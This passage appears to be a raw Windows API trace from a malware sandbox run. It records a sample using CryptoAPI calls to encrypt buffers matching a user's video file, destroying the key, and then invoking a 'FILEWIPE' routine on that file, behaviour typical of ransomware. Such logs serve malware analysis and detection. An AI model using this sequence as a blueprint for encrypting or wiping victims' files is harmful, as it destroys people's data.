(HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0195.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0195.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0195.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0195.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0195.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0195.889] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0195.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0195.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0195.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0195.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0195.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0195.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0195.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0195.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0195.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0195.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0195.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0195.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0195.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0195.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0195.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0195.891] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0195.891] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0195.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0195.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.892] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0195.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0195.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0195.892] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0195.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0195.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0195.892] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0195.892] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0195.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0195.892] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0195.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0195.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0195.892] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0195.892] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0195.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0195.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0195.893] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0195.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0195.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0195.893] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0195.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.895] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xab9c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xaba0) returned 1 [0195.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0195.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.895] CharLowerBuffW (in: lpsz="byte[43937]", cchLength=0xb | out: lpsz="byte[43937]") returned 0xb [0195.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0195.912] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0195.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.912] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xab9c, dwBufLen=0xaba0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xaba0) returned 1 [0196.033] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.033] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0196.033] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.036] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.036] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.036] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.049] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.049] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.049] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0196.049] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.049] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.049] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0196.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.050] CryptDestroyKey (hKey=0x90af18) returned 1 [0196.050] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.050] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.050] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.050] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.050] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.050] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0196.050] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.051] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.051] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.051] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.051] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.051] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.051] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0196.052] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.052] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0196.052] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.052] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0196.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.052] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0196.052] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.052] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0196.052] FreeLibrary (hLibModule=0x74f20000) returned 1 [0196.052] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.052] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.053] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.054] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.055] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.055] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0196.055] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.056] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x50adf490, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 0x90ae18 [0196.056] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0196.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.056] CharLowerBuffW (in: lpsz="byte[43932]", cchLength=0xb | out: lpsz="byte[43932]") returned 0xb [0196.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.056] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0196.057] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.057] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0196.057] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0196.057] FreeLibrary (hLibModule=0x75c90000) returned 1 [0196.057] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, 